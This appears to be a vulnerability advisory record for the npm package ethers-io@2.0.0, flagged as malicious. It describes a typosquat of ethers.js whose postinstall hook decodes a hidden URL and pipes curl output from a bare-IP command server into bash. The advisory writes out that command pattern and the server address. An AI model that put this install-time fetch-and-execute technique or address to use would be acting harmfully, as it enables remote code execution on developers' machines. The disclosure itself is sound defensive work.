ethers-io@2.0.0

Vulnerability report · Last retrieved from osv.dev June 23, 2026 at 3:29 AM UTC

Malicious

OSV ID

MAL-2026-3708

Ecosystem

npm

Summary

The package's package.json declares a postinstall script that base64-decodes a hidden URL (http://8.217.75.147:3000/payload) and pipes the HTTP response straight into bash via curl -s <url> | bash. On every npm install, including installs where the package is only a transitive dependency, arbitrary attacker-controlled shell code is fetched over plain HTTP from a bare IPv4 address and executed on the machine running the install: no TLS, no integrity verification, and content the attacker can change at any time. Multiple independent block signals stack here: an obfuscated URL inside a lifecycle hook, curl piped to bash, a bare-IP plaintext C2 endpoint, and a mismatch between the install behaviour and the package's stated purpose. The name ethers-io and the stated purpose "I/O utilities for ethers.js" also impersonate the well-known ethers.js ecosystem, and the declared repository points at github.com/ethers-utils/ethers-io rather than the genuine ethers.js organization. The result is a typosquat lure wrapped around install-time remote code execution.

Source: amazon-inspector (098acd1dccfed8bcaea9f56206745eef7c9e4cd368599ba23f762a84c86bbc14)
